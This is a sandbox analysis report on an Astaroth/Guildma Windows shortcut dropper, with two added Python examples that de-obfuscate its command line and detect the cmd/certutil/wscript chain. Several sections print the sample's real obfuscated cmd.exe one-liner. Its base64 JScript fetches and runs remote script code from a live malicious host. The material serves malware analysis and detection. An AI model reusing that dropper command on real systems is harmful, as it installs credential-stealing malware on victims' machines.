Windows Analysis Report
Pyo37mDzQ2.lnk

Overview

General Information

Sample Name: Pyo37mDzQ2.lnk
Analysis ID: 795108
MD5: d52ac7755bd61b035235df79fabe1b59
SHA1: 4e7a57f7c7fc8ee15cb390337983d116220c7625
SHA256: f3c3d2fae15f05589f8860df40d0533165484fb2975b2204c2f7cca750eb7b51
Tags: Astaroth, BR, Ageo, Guildma, lnk

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Snort IDS alert for network traffic
Obfuscated command line found
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Source: unknown HTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.6:49712 version: TLS 1.2

Networking

Source: C:\Windows\System32\wscript.exe Network Connect: 104.21.40.83 80 Jump to behavior
Source: C:\Windows\System32\wscript.exe Domain query: www.cloudflare.com
Source: C:\Windows\System32\wscript.exe Domain query: niua9f.tabcoperoo.sbs
Source: C:\Windows\System32\wscript.exe Network Connect: 104.16.123.96 443 Jump to behavior
Source: Traffic Snort IDS: 2851288 ETPRO TROJAN Astaroth Stealer Activity (GET) 192.168.2.6:49711 -> 104.21.40.83:80
Source: global traffic HTTP traffic detected: GET /cdn-cgi/error HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Connection: Keep-Alive
    Host: www.cloudflare.com
Source: global traffic HTTP traffic detected: GET /?1/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: niua9f.tabcoperoo.sbs
    Connection: Keep-Alive
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View IP Address: 104.16.123.96 104.16.123.96
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
    Date: Tue, 31 Jan 2023 11:59:15 GMT
    Transfer-Encoding: chunked
    Connection: close
    CF-Cache-Status: MISS
    Set-Cookie: __cf_bm=BIs2LD8_lhYDyYXTr0ymbzT_KjzhpIsN6DuljoTCxPg-1675166355-0-AV0FRZbQ/YWpHBGdw9CVjNw7G3I271nQZwq5VNc0+DtOmaDFBWm4yRe3SpBDVzanTI+rvMZJJ+XxqLF7XCOqemeSvMWAAipIG/oYn2fhIk83; path=/; expires=Tue, 31-Jan-23 12:29:15 GMT; domain=.www.cloudflare.com; HttpOnly; Secure; SameSite=None
    Server-Timing: cf-q-config;dur=8.000002708286e-06
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hNqoFO77GrxC4JG2BDzytZSNLUsdJe6l4oWIHVR1%2FQiLT3nU62Aje%2BDZd%2FXg0%2BSlGBRK9IsQhcIJX3XRAcR%2F08liOBCIEl%2ByvnWfusySEzWgAXvDKFweB1o508oh0bj7gDofBA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Set-Cookie: __cflb=02DiuJFZNR1vT983reJ7ooDAdV9yu7NGmzFHzmddKWhKi; SameSite=None; Secure; path=/; expires=Wed, 01-Feb-23 10:59:15 GMT; HttpOnly
    Server: cloudflare
    CF-RAY: 792247b819f291f3-FRA
    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: wscript.exe, 00000003.00000003.253451427.0000021060705000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: hTtP://niua9f.tabcoperoo.sbs/?1/
Source: wscript.exe, 00000003.00000003.253408697.00000210607A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248160964.00000210607A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.254191636.00000210607A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://niua9f.tabcoperoo.sbs/
Source: wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060705000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://niua9f.tabcoperoo.sbs/?1/
Source: wscript.exe, 00000003.00000002.254076024.0000021060728000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253581606.0000021060728000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.comp
Source: wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/
Source: wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/M
Source: wscript.exe, 00000003.00000003.253581606.0000021060783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/error
Source: wscript.exe, 00000003.00000003.248214429.0000021060783000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorP%
Source: wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errore.com/U
Source: unknown DNS traffic detected: queries for: niua9f.tabcoperoo.sbs
Source: global traffic HTTP traffic detected: GET /cdn-cgi/error HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Connection: Keep-Alive
    Host: www.cloudflare.com
Source: global traffic HTTP traffic detected: GET /?1/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: niua9f.tabcoperoo.sbs
    Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: C:\Windows\System32\certutil.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\9cEA9JA\>nul 2>&1 &&s^eT SEEH=C:\9cEA9JA\^9cEA9JA.^jS&&echo dmFyIENmS3I9InNjIisiciI7RGZLcj0iaXAiKyJ0OmgiO0VmS3I9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDZktyK0RmS3IrRWZLcisiLy9uaXVhOWYudGFiY29wZXJvby5zYnMvPzEvIik7>!SEEH!&&cErtUtil -f -dEco^de !SEEH! !SEEH!&&ca^ll !SEEH!
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\9cEA9JA\9cEA9JA.jS C:\9cEA9JA\9cEA9JA.jS
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\9cEA9JA\9cEA9JA.jS"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\9cEA9JA\9cEA9JA.jS C:\9cEA9JA\9cEA9JA.jS Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\9cEA9JA\9cEA9JA.jS" Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: classification engine Classification label: mal68.evad.winLNK@6/1@2/2
Source: C:\Windows\System32\cmd.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior

Data Obfuscation

Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\9cEA9JA\>nul 2>&1 &&s^eT SEEH=C:\9cEA9JA\^9cEA9JA.^jS&&echo dmFyIENmS3I9InNjIisiciI7RGZLcj0iaXAiKyJ0OmgiO0VmS3I9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDZktyK0RmS3IrRWZLcisiLy9uaXVhOWYudGFiY29wZXJvby5zYnMvPzEvIik7>!SEEH!&&cErtUtil -f -dEco^de !SEEH! !SEEH!&&ca^ll !SEEH!
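The command line above is the whole first stage of the chain the sandbox recorded: cmd.exe runs with /V (delayed expansion) so that !SEEH! is resolved at each step, carets split keywords (s^eT, -dEco^de, ca^ll) so string matching on "set", "decode" or "call" fails, a base64 blob is echoed into C:\9cEA9JA\9cEA9JA.jS, certutil -decode overwrites that file with its decoded contents, and "call" on the .jS path hands it to the registered script host, which the process tree shows is WScript.exe. The script below is an added example, not part of the Joe Sandbox report, that performs that de-obfuscation statically and offline: it strips the carets, replays the set/echo stages, base64-decodes the blob exactly as certutil would, and then folds the decoded JScript's string concatenation to recover the argument of GetObject(). That argument uses the script: moniker, which makes the script host fetch and execute a remote scriptlet from the URL; the recovered value matches the hTtP://niua9f.tabcoperoo.sbs/?1/ string the report found in wscript.exe memory. The cmd line and blob are the report's own; LnkChain, deobfuscate and the other names are this example's.

```python
"""Static de-obfuscation of the cmd.exe one-liner launched by the LNK (added example)."""
import base64
import re
from dataclasses import dataclass, field

# Argument string from the report's "Process created: cmd.exe" line, copied verbatim.
LNK_CMDLINE = (
    r"C:\Windows\system32\cmd.exe /V/D/c md C:\9cEA9JA\>nul 2>&1 "
    r"&&s^eT SEEH=C:\9cEA9JA\^9cEA9JA.^jS&&echo "
    "dmFyIENmS3I9InNjIisiciI7RGZLcj0iaXAiKyJ0OmgiO0VmS3I9IlQiKyJ0UCIrIjoiO0dldE9i"
    "amVjdChDZktyK0RmS3IrRWZLcisiLy9uaXVhOWYudGFiY29wZXJvby5zYnMvPzEvIik7"
    r">!SEEH!&&cErtUtil -f -dEco^de !SEEH! !SEEH!&&ca^ll !SEEH!"
)


@dataclass
class LnkChain:
    stages: list = field(default_factory=list)     # caret-stripped, !VAR!-expanded stages
    dropped_path: str = ""                          # file the base64 blob is echoed into
    encoded_blob: str = ""
    decoded_script: str = ""                        # what certutil -decode writes back
    script_vars: dict = field(default_factory=dict)  # resolved JScript string variables
    getobject_arg: str = ""                         # fully resolved GetObject() argument


def strip_carets(s: str) -> str:
    # In cmd.exe, ^ escapes the following character; ^^ yields a literal ^.
    return re.sub(r"\^(.)", r"\1", s)


def expand_delayed(s: str, env: dict) -> str:
    # /V enables delayed expansion, so !NAME! is resolved when each stage runs.
    return re.sub(r"!(\w+)!", lambda m: env.get(m.group(1), m.group(0)), s)


# JScript pieces: "literal" or identifier terms, name=expr; assignments, GetObject(expr);
TERM = re.compile(r'"([^"]*)"|([A-Za-z_]\w*)')
ASSIGN = re.compile(r'(?:var\s+)?\b([A-Za-z_]\w*)\s*=\s*([^;]+);')
GETOBJECT = re.compile(r'GetObject\((.*?)\);')


def eval_concat(expr: str, env: dict) -> str:
    """Fold an expression made only of "literal" + name terms into one string."""
    return "".join(
        m.group(1) if m.group(1) is not None else env[m.group(2)]
        for m in TERM.finditer(expr)
    )


def resolve_jscript(js: str):
    """Evaluate the variable assignments in order, then the GetObject() argument."""
    env = {}
    for m in ASSIGN.finditer(js):
        env[m.group(1)] = eval_concat(m.group(2), env)
    call = GETOBJECT.search(js)
    return env, (eval_concat(call.group(1), env) if call else "")


def deobfuscate(cmdline: str) -> LnkChain:
    chain = LnkChain()
    env = {}
    for raw in strip_carets(cmdline).split("&&"):
        stage = expand_delayed(raw.strip(), env)
        chain.stages.append(stage)
        if m := re.match(r"set\s+(\w+)=(.*)", stage, re.I):
            env[m.group(1)] = m.group(2)                       # s^eT SEEH=<path>
        elif m := re.match(r"echo\s+(.+?)>(.+)", stage, re.I):
            chain.encoded_blob = m.group(1)                     # echo <base64>><path>
            chain.dropped_path = m.group(2).strip()
    # certutil -f -decode <file> <file> decodes headerless base64 in place.
    chain.decoded_script = base64.b64decode(chain.encoded_blob).decode()
    chain.script_vars, chain.getobject_arg = resolve_jscript(chain.decoded_script)
    return chain


if __name__ == "__main__":
    c = deobfuscate(LNK_CMDLINE)
    for s in c.stages:
        print("stage:", s)
    print("decoded .jS:", c.decoded_script)
    print("GetObject argument:", c.getobject_arg)
```

The certutil and call stages come out exactly as the report's child-process lines show them, which is a useful sanity check when adapting the script to a variant: if the replayed stages do not match what the sandbox spawned, the cmd-line parsing is wrong before any base64 work starts.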

Persistence and Installation Behavior

Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: wscript.exe, 00000003.00000002.254076024.0000021060728000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253581606.0000021060728000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW/
Source: wscript.exe, 00000003.00000003.253581606.000002106078D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.254076024.000002106078D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.000002106078D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe Network Connect: 104.21.40.83 80 Jump to behavior
Source: C:\Windows\System32\wscript.exe Domain query: www.cloudflare.com
Source: C:\Windows\System32\wscript.exe Domain query: niua9f.tabcoperoo.sbs
Source: C:\Windows\System32\wscript.exe Network Connect: 104.16.123.96 443 Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\9cEA9JA\>nul 2>&1 &&s^eT SEEH=C:\9cEA9JA\^9cEA9JA.^jS&&echo dmFyIENmS3I9InNjIisiciI7RGZLcj0iaXAiKyJ0OmgiO0VmS3I9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDZktyK0RmS3IrRWZLcisiLy9uaXVhOWYudGFiY29wZXJvby5zYnMvPzEvIik7>!SEEH!&&cErtUtil -f -dEco^de !SEEH! !SEEH!&&ca^ll !SEEH!
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\9cEA9JA\9cEA9JA.jS C:\9cEA9JA\9cEA9JA.jS Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\9cEA9JA\9cEA9JA.jS" Jump to behavior
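The three process-creation lines above are the chain a detection should key on: cmd.exe with a caret-obfuscated, delayed-expansion command line that echoes a long base64 string to disk, certutil -decode with the same path as input and output, and wscript.exe then executing exactly the file certutil wrote, all under the same cmd.exe parent. The code below is an added example, not from the report or the sandbox, that implements those checks over constructed process-creation events (Sysmon event 1 style: pid, ppid, image, command line). The command lines are the report's own; the pids, the explorer.exe parent and the benign certutil -encode and cmd.exe controls are made up for the example.

```python
"""Detection logic for the cmd.exe / certutil -decode / wscript.exe chain (added example)."""
import re

# The report's cmd.exe argument string, verbatim.
LNK_CMDLINE = (
    r"C:\Windows\system32\cmd.exe /V/D/c md C:\9cEA9JA\>nul 2>&1 "
    r"&&s^eT SEEH=C:\9cEA9JA\^9cEA9JA.^jS&&echo "
    "dmFyIENmS3I9InNjIisiciI7RGZLcj0iaXAiKyJ0OmgiO0VmS3I9IlQiKyJ0UCIrIjoiO0dldE9i"
    "amVjdChDZktyK0RmS3IrRWZLcisiLy9uaXVhOWYudGFiY29wZXJvby5zYnMvPzEvIik7"
    r">!SEEH!&&cErtUtil -f -dEco^de !SEEH! !SEEH!&&ca^ll !SEEH!"
)

# Constructed events modelled on the report's process tree (pids made up),
# plus two benign controls that must not alert.
EVENTS = [
    {"pid": 4, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\Explorer.EXE"},
    {"pid": 2200, "ppid": 4, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": LNK_CMDLINE},
    {"pid": 2216, "ppid": 2200, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"cErtUtil -f -dEcode C:\9cEA9JA\9cEA9JA.jS C:\9cEA9JA\9cEA9JA.jS"},
    {"pid": 2240, "ppid": 2200, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\9cEA9JA\9cEA9JA.jS"'},
    {"pid": 3000, "ppid": 2500, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -encode C:\Temp\server.cer C:\Temp\server.b64"},
    {"pid": 3001, "ppid": 2500, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c echo hello > C:\Temp\x.txt"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def obfuscation_score(cmdline: str) -> int:
    """Count the cmd.exe tricks the sample combines; 2 of 3 is the alert threshold."""
    score = 0
    if len(re.findall(r"[A-Za-z]\^[A-Za-z]", cmdline)) >= 2:       # s^eT, -dEco^de, ca^ll
        score += 1
    if re.search(r"/V\b", cmdline, re.I) and re.search(r"!\w+!", cmdline):  # delayed expansion
        score += 1
    if re.search(r"\becho\s+[A-Za-z0-9+/=]{64,}\s*>", cmdline, re.I):  # base64 written to disk
        score += 1
    return score


def certutil_args(cmdline: str) -> list:
    """Positional (non-switch) arguments after the executable, e.g. the in/out files."""
    return [t for t in cmdline.split()[1:] if not t.startswith("-")]


def script_host_target(cmdline: str) -> str:
    """Script path handed to wscript/cscript: the last quoted or bare argument."""
    toks = [a or b for a, b in re.findall(r'"([^"]+)"|(\S+)', cmdline)]
    return toks[-1] if len(toks) > 1 else ""


def detect(events: list) -> list:
    by_pid = {e["pid"]: e for e in events}
    decoded = {}   # lower-cased certutil -decode output path -> certutil pid
    alerts = []
    for e in events:
        name, cl = image_name(e["image"]), e["cmdline"]
        if name == "cmd.exe" and obfuscation_score(cl) >= 2:
            alerts.append(("obfuscated_cmdline", e["pid"]))
        if name == "certutil.exe" and re.search(r"-decode\b", cl, re.I):
            args = certutil_args(cl)
            if len(args) >= 2:
                decoded[args[-1].lower()] = e["pid"]
                if args[-2].lower() == args[-1].lower():        # file decoded onto itself
                    alerts.append(("certutil_decode_in_place", e["pid"]))
        if name in SCRIPT_HOSTS:
            target = script_host_target(cl).lower()
            if target in decoded:
                # True when the certutil that wrote the file shares this cmd.exe parent
                same_parent = by_pid[decoded[target]]["ppid"] == e["ppid"]
                alerts.append(("decoded_script_executed", e["pid"], same_parent))
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Keying the last rule on the decoded file's path rather than on certutil alone keeps the benign control quiet: certutil -encode and legitimate -decode of a .cer into a different file produce no alert, while a script host opening the file certutil just rewrote is the step that actually matters.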
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior